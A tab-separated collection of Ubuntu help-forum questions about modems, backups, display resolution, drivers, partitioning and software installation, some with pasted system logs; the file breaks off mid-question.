176723	mobile broadband with huawei e1552/e1800	i ca n't establish the mobile broadband connection ( i created the new connection in nw ) via usb 3.0 on dell inspiron 5520 . ubuntu 12.04. lsusb : bus 003 device 005 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) log after inserting : usb_modeswitch log from fri aug 17 00:12:39 2012 using global config file : /etc/usb_modeswitch.conf raw args from udev : /3-4:1.0 bus id for device not given by udev . trying to determine it from kernel name ( 3-4:1.0 ) ... using top device dir /sys/bus/usb/devices/3-4 usb dir exists : /sys/bus/usb/devices/3-4 warning : usb attribute `` serial '' not readable . scsi dir exists : /sys/bus/usb/devices/3-4 warning : scsi attribute `` vendor '' not readable . warning : scses , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 no new devices in target mode or class found mode switch has failed . bye . fail : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( end of usb_modeswitch output ) usb dir exists : /sys/bus/usb/devices/3-4 warning : usb attribute `` serial '' not readable . all done , exitingi attribute `` model '' not readable . warning : scsi attribute `` rev '' not readable . -- -- -- -- -- -- -- -- usb values from sysfs : idvendor 12d1 idproduct 1446 manufacturer huawei technology product huawei mobile serial ( null ) bnumconfigurations 1 -- -- -- -- -- -- -- -- bnumconfigurations is 1 - do n't check for active configuration found packed config collection /usr/share/usb_modeswitch/configpack.tar.gz searching entries named : /usr/share/usb_modeswitch/12d1:1446* searching overriding entries named : /etc/usb_modeswitch.d/12d1:1446* scsi attributes not needed , moving on . extracting config 12d1:1446 from collection /usr/share/usb_modeswitch/configpack.tar.gz config : targetvendor set to 12d1 config : targetproduct set to 1001,1406,140b,140c,1412,141b,1433,1436,14ac,1506 driver module is `` option '' , id path is /sys/bus/usb-serial/drivers/option1 ! matched , now switching command to be run : /usr/sbin/usb_modeswitch -i -w -d -s 20 -c /run/usb_modeswitch/current_cfg -u -1 -v 12d1 -p 1446 2 > & 1 verbose debug output of usb_modeswitch and libusb follows ( note that some usb errors are expected in the process ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- reading config file : /run/usb_modeswitch/current_cfg * usb_modeswitch : handle usb devices with multiple modes * version 1.2.3 ( c ) josua dietze 2012 * based on libusb0 ( 0.1.12 and above ) ! please report new configurations ! defaultvendor= 0x12d1 defaultproduct= 0x1446 targetvendor= 0x12d1 targetproduct= not set targetclass= not set targetproductlist= '' 1001,1406,140b,140c,1412,141b,1433,1436,14ac,1506 '' detachstorageonly=0 huaweimode=0 sierramode=0 sonymode=0 qisdamode=0 gctmode=0 kobilmode=0 sequansmode=0 mobileactionmode=0 ciscomode=0 messageendpoint= not set messagecontent= '' 55534243123456780000000000000011062000000100000000000000000000 '' needresponse=0 responseendpoint= not set inquiredevice disabled success check enabled , max . wait time 20 seconds system integration mode enabled looking for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 no devices in target mode or class found looking for default devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id found matching product id adding device searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 found device in default mode , class or configuration ( 1 ) accessing device 016 on bus 003 ... skipping the check for the current configuration using first interface : 0x00 using endpoints 0x01 ( out ) and 0x81 ( in ) usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : huawei technology product : huawei mobile serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - looking for active driver ... ok , driver found ( `` usb-storage '' ) ok , driver `` usb-storage '' detached setting up communication with interface 0 using endpoint 0x01 for message sending ... trying to send message 1 to endpoint 0x01 ... ok , message successfully sent resetting response endpoint 0x81 resetting message endpoint 0x01 checking for mode switch ( max . 20 times , once per second ) ... searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1446 found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 0a5c:21d7 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0c45:648d searching devices , found usb id 0bda:0129 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 no new devices in target mode or class found mode switch has failed . bye . fail : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( end of usb_modeswitch output ) usb dir exists : /sys/bus/usb/devices/3-4 warning : usb attribute `` serial '' not readable . all done , exiting one time connection established ( before it i made some random steps in bios ) , but later all became as earlier . i found the same problems ( http : //ubuntuforums.org/showthread.php ? t=1996734 and http : //smackerelofopinion.blogspot.com/2012/02/3g-using-huawei-e1552e1800-hspa-modem.html ) and made the same steps , but lsusb does n't changes . only one time it unexpectedly changed to 'bus 002 device 012 : id 12d1:14ac huawei technologies co. , ltd. ' ( as it must be using usb 2.0 ) and connection established , but i dropped down the laptop and modem was disconnected . i 've never got working internet via modem since that time , lsusb shows 'bus 003 device 016 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) ' . also : vladiator @ vladiatro : ~ $ sudo usb_modeswitch -v 0x12d1 -p 1446 -v 0x12d1 -p 1446 -r [ sudo ] password for vladiator : looking for target devices ... found matching product id adding device found devices in target mode or class ( 1 ) looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 016 on bus 003 ... getting the current device configuration ... ok , got current device configuration ( 1 ) using first interface : 0x00 using endpoints 0x01 ( out ) and 0x81 ( in ) inquiring device details ; driver will be detached ... looking for active driver ... **no driver found . either detached before or never attached** scsi inquiry data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - vendor string : huawei model string : mass storage revision string : 2.31 -- -- -- -- -- -- -- -- -- -- -- -- - usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : huawei technology product : huawei mobile serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - warning : no switching method given . resetting usb device . ok , device was reset - > run lsusb to note any changes . bye . lsusb does n't change . one time driver was found , but this program could n't finish and i stopped it by ctrl+c . it does n't change anything . thanks , vladiator .
176726	what are the advantages and disadventages of git or bzr + rsync vs rdiff-backup ?	i used to use rsync to do backups , but then i switched to rdiff-backup to incremental backups . recently , i discovered git and bzr while working on a coding project . so , i was thinking , i could have my backup disk be a repository in either git or bzr . then i could rsync to the repository , and commit the changes . would there be any performance concerns with this ? any other issues that i 'm not thinking of ? the benefit i see in using rsync is that you can restart an interrupted transfer , while rdiff-backup reverts to the last version , and then starts again . any reason not to do it this way ? anything i 'm not thinking of ?
176729	how to detect hdmi disconnect/tv off	i 'm using ubuntu for an htpc and i wanted to kill a bunch of processes like the browser when the tv is turned off . this is because i have limited bandwidth and want to avoid chance of streaming content while tv is off , wasting bandwidth . my solution was to have a cron task run every minute checking for off state . but i 'm do n't know how to detect hdmi disconnect/tv off . i 've been using this fix : hdmi audio stops after tv turned off for hdmi sound fix when tv turns off . so i could modify the code such that when eld_valid switches from 1 to 0 , it 's time to kill stuff . but i believe it 's monitoring sound status over hdmi ? also it seems like a bug fix , so my script would work as long as bug is present ? xrandr looked promising but you have to run it as user connected to a display . so i could n't test what output it gives when tv is off from an ssh connection . hdmi cec codes seemed like another solution but you have to buy an adapter and my tv does n't support cec . any suggestions ? thanks . p.s . i 'm using ati catalyst drivers . i 'd be happy with ati specific solution .
176732	how do i fix age of empires color problem ?	i have followed the tutorial here and i got everything to work but the graphics . below is what it looks like when i play the william wallace campaign . i need help . i really want to play the game without these wrong colors , my ubuntu version is 11.10 .
176733	can i run games that i normally run on ultra settings on windows 7 ?	i know this maybe had been asked a lot in the past but the thing is that i want to know if i can run games smoothly such as skyrim , cod : black ops , prototype 2 , fifa 12 , etc using the 64 bit version of ubuntu 12.04 of course . i 'm doing this because linux always drag my attention but i never tried because of what people said about its performance , so what do you guys think ? my pc specs are : intel core i7 870 8 gb ddr3 ram ati hd 5750 motherboard intel extreme series dp55kg
176740	how to fix `` 16 bit ms-dos subsystem ... illegal instruction '' installing u1 on windows xp ?	i was trying to install ubuntu one client on my windows computer , and got this : i tried clicking ignore , but then there were even more errors .
176743	merge multiple small pdfs on a4 size format	i have a pdf file with approximatly 300 pages ( a4 ) . on each page some text with lines are plotted , which take up only a third of the page size . so i want to get rid of the white space everywhere . i used the burst command to create for every page a single pdf-file which have no white space on it . now i need to join these pdfs on a4 papersize . when i use pdftk i get several pages , which have no whitespace , but when i want to print them , they will be printed out on separate pages . has someone an idea how to handle this problem ? ?
176744	how to upgrade nautilus to 3.4 on 11.04 ?	i 'd like to upgrade nautilus from 2.32.2.1 to 3.4 because i 've encountered a problem which i can not reproduce on nautilus 3.4 ( on ubuntu 12.04 ) . i guess there might be a bug in my current version . the problem is that i 'm not that sure if i can simply install a newer version on ubuntu natty without causing trouble , because i do n't want to change the whole desktop . i took a look on the package for precise just to see if it works , but after following a few dependencies i end up at the decision to destroy a package ( libc-dev-bin ) which i do n't want to do with my little experience . is it even possible to upgrade and if yes , how could i achieve that ? ( if you know some good explanations of the issue packages & dependencies please feel free to post )
176749	partitioning with windows 7 , no free space	all my free space is taken by sda1 ( ntfs ) , sda2 ( ntfs ) , and sda3 ( ntfs ) . under device for boot loader installation , it says that sda1 and 2 are both windows 7 ( loader ) , and sda3 are windows recovery environment . i really do n't want to mess up windows , what should i do ? i 'm trying to run it as a dual boot , and have one hard drive .
176751	change resolution for an old philips 109e5 monitor ?	i have an old monitor philips 109e5 19 inch and i need configuring a resolution of 1600x1200 . how i can do it ?
176760	should i install the fglrx drivers or stick with radeon ? [ ubuntu 12.04 ] [ radeon hd 4850 ]	i 've heard many people complain about the ati drivers on ubuntu 12.04 . so should i stay with radeon drivers ( which im not sure if they are good enough ) or try install fglrx and risk getting a buggy system ?
176761	macbook air and ubuntu 12.04 : good buy or go for an ultrabook ?	i tried to set up a macbook pro with ubuntu 12.04 and setting up was easy as pie except for a slew of trackpad issues i could never resolve , particularly resting thumb on trackpad while navigating resulted in skipping issues . now im in the market for an ultrabook and a macbook air is what i 'm leaning towards but not if its going to be a problem ith ubuntu 12.04/12.10 -- any ideas how well the trackpad works or how to get the trackpad to behave perfectly ?
176769	increase or view all stored history in gedit	i would like to be able to see the last ~200 files opened in gedit . i was able to increase the number it shows to 40 using this command : gconftool-2 -- type int -- set /apps/gedit-2/preferences/ui/recents/max_recents 40 but it is only showing me the last 23 . i looked in .recently-used.xbel and found that it has only stored the last 23 opened gedit files , as well as files from other applications . is there a way to increase this ? i accept that the last ~200 opened in gedit are no longer stored , but i would like to store them in the future so i can view them . essentially , can i tell ubuntu to keep ~10x more history in that recently-used.xbel file ?
176770	how to run a command as root at an ubuntu server start-up ?	i use the following simple solution for port forwarding : sudo su nohup redir -- lport 80 -- caddr 192.168.1.2 -- cport 80 & it works this way and does n't work any other ( like sudo nohup ... for example ) . i 'd like this to be done automatically at my ubuntu 12.04 server start-up . where can i put this ?
176775	how to make rhythmbox toggle between pause and play with spacebar ?	when ever i press space in rhythmbox the song starts over instead of going on pause and when its on pause and i press space the song starts over again instead of resuming from where it left of . so my question is how can i change this so it will toggle between pause/play ?
176776	ubuntu 12.04 slow installs after ssd upgrade	ok . so i just installed a new ssd into my laptop and put a fresh copy of ubuntu 12.04 onto the drive . the os install took about 45 minutes longer than it ever did with my hdd . whenever i go to update software and do the regular updates they take forever . every update package seems to lag on `` unpacking replacement '' . i have already been through all of the threads and tried optimizing my drive for ssd to no avail . the system itself is noticeably faster , it just slows way down when i begin updating or installing new software . any ideas ? here is my system info : ubuntu 12.04 64-bit samsung r540 laptop intel i3 processor 8gb pc3-10600 intel® core™ i3 cpu m 380 @ 2.53ghz × 4 60gb corsair ssd drive cssd-v60gb2
176778	12.04 crashes and get i/o error , dev sda , sector xxx ... in console mode	it 's the first time i ask something here and i 'm a newbie in this ubuntu world . if i do n't explain myself in a proper way , please tell me and i 'll try to provide more details . today i 've been working with 12.04 and i got 3 crashes . the three of them have randomly occurred . i could n't do anything , just to move the mouse but nothing worked . then , i entered in console mode and i could n't even log in or use ctrl+alt+del , every time i hit enter i got this message : [ xxxx.xxxxxx ] end_request : i/o error , dev sda , sector xxxxxxxxx ( the xs are numbers ) . i had to use rseiub trick to reboot my pc , it 's been the only thing that has worked . i really want to know what is causing these crashes and i hope you could help me . for more details these are my pc 's specs : processor : 2x amd athlon ( tm ) ii x2 250 processor memory : 4049mb gpu : nvidia geforce 8600
176779	can app developers indicate folders to be excluded from déjà dup ?	os x‘s time machine backup system has an api that let application developers indicate that certain folders belonging to the application should be excluded from the user‘s backup . this is done through an extended attribute set on the directory in the file system . with the mission statement “ [ … ] [ déjà dup ] hides the complexity of doing backups [ … ] ” i kind of expect there to be such a thing . as an application’s developer should be well suited to know what folders are safe to exclude . but i can not find any mention of it online . nudges in the right direction or to the right feature request would be appreciated .
176788	how do i get mrbs installed and working ?	i 'm trying to install meeting room booking system on ubuntu 12.04 i think i have apache and php5 up and working fine . a test.php file with contents : < ? php phpinfo ( ) ; ? > loads and gives me plenty of info . here 's the guide i attempted to follow http : //www.techrepublic.com/blog/doityourself-it-guy/diy-install-and-configure-meeting-room-booking-system/678 unfortunately i point my browser at localhost/mrbs/web/ and i get a blank document . any ideas ?
176792	kde system tray locks ui while redrawing	kde 4.8.2 whenever a notification is displayed or the kde panel attempts to change the contents of the system tray my system 's ui locks up because x is using 100 % cpu . this occurs both when desktop effects are enabled and disabled , and it seems to be linked to the panel system tray ( full panel without system tray = fine , empty panel with system tray = lock ) . any idea what could be going wrong , or does anyone have a good idea on how to begin troubleshooting this ?
176797	ca n't boot from sd card	i installed backtrack via unetbootin into sd card , but i see no option in boot menu in bios . what to do ?
176798	how to install java inside a chroot ?	i want to execute a java program inside my debootstrap-chroot on an ubuntu machine for which i need to have java installed inside the chroot jail . i tried to install it using : apt-get install openjdk-6-jdk but it gives an error : '' perl : warning : setting locale failed '' how can i fix this ? or is there a better way ?
176801	can not change screen resolution in mate	i just installed mate . it seems so windows98'ish and i can not change the screen resolution . i change it to 1280x960 and it shows that it 's changed but it does n't change and resolution is still the same . i have installed the proprietary ati drivers
176802	help with partitioning in ubuntu 12.04 ?	i 'm a total noob at linux . in fact , the only version of linux i ever used was 12.04 through wubi . i know just a little but recently i deleted windows 7 off my hard drive and i just did a flash drive installation of 12.04 . well it 's been a while and when i had windows 7 , my hobby was making youtube videos/editing photos and such . well to get back on track with that i did a fresh install of ubuntu studio 12.04 . no problem but i really miss having windows so i made a bootable usb drive of windows 8 and i went to install it but it says my hard drive is n't formatted in ntfs and it would n't let me format it in the installer . i 'm not planning on leaving ubuntu studio 12.04 any time soon but there are just some programs that i ca n't run in linux nor is there software like them . so to wipe/format my hard drive to ntfs , people are saying i have to use a live cd/usb and do it from there . i do n't have any space usb drives or discs . so , i 'm left with partitioning and for some reason gparted wo n't let me do it . below is a photo ( i.imgur.com ) . sorry i could n't post the image as i 'm a new member .
176803	ubuntu 12.04 wo n't boot on toshiba satellite l855	i recently attempted to install ubuntu 12.04 onto satellite and problems during the boot splash , right after grub . i tried booting from a usb as well as a cd . i put a friend 's hard drive into the satellite and ubuntu loaded up just fine . i also attempted to install ubuntu onto my hard drive from my friend 's computer and ubuntu worked fine from the hard drive when it was on his computer . as soon as i put the hard drive back into the satellite , i faced the issue in which my computer would get stuck at the boot splash . computer : toshiba satellite l855 - s5242 processor : amd a8-4500m apu video card : amd radeon hd 7640g 6gb ram i think it might have something to do with the network card because during the boot splash , the starting up of the network manager would stop the boot and it would get stuck .
176805	video streams requiring windows media player plugin stopped working	video streams requiring windows media player plugin stopped working . ( probably after vlc or/and gnome media player installs - uninstalling did not help ) i have gstreamer installed . i have totem , vlc and gecko plugins . tried to disable and uninstall each one of them in any available combination , leaving only one of them etc . nothing helps . tried different browsers - all same . i get `` missing plugin '' i have ubuntu 12.04 64 bit any suggestions ? thanks
176810	why does the common internet stop working when i connect to an openvpn server ?	i 've set up an openvpn daemon on an ubuntu server of mine and as soon as i connect to it from my ubuntu laptop with a network manager plug-in web pages wo n't open any more ( but get ok as soon as i disconnect from the vpn ) . i 've tried to use command-line openvpn client and it works ok ( both internet and vpn are accessible ) . but when i use network manager - only local and vpn hosts are accessible .
176812	how to set the monitor to its native resolution when xrandr approach is n't working ?	i am trying to setup my samsung syncmaster b2030 monitor in ubuntu 12.04 . it 's native resolution is 1600x900 which i am not getting in ubuntu and which i am trying to get . i tried using xrandr approach provided in these urls : 1 ) http : //www.ubuntugeek.com/how-change-display-resolution-settings-using-xrandr.html 2 ) how to set the monitor to its native resolution which is not listed in the resolutions list ? s1 ) i used cvt 1600 900 60 to get the modeline . output was : # 1600x900 59.95 hz ( cvt 1.44m9 ) hsync : 55.99 khz ; pclk : 118.25 mhz modeline `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync s2 ) i then used xrandr and output was : screen 0 : minimum 8 x 8 , current 1152 x 864 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected 1152x864+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) which gave me `` vga-0 '' . s3 ) then i used xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync but instead of adding the modeline it just threw an error : x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 29 current serial number in output stream : 29 my system details : 1 ) ubuntu 12.04 lts 2 ) graphic card : geforce 9400 gt/pcie/sse2 ( driver is successfully installed . i am checking it in system settings > details . and it 's showing that driver is installed and its 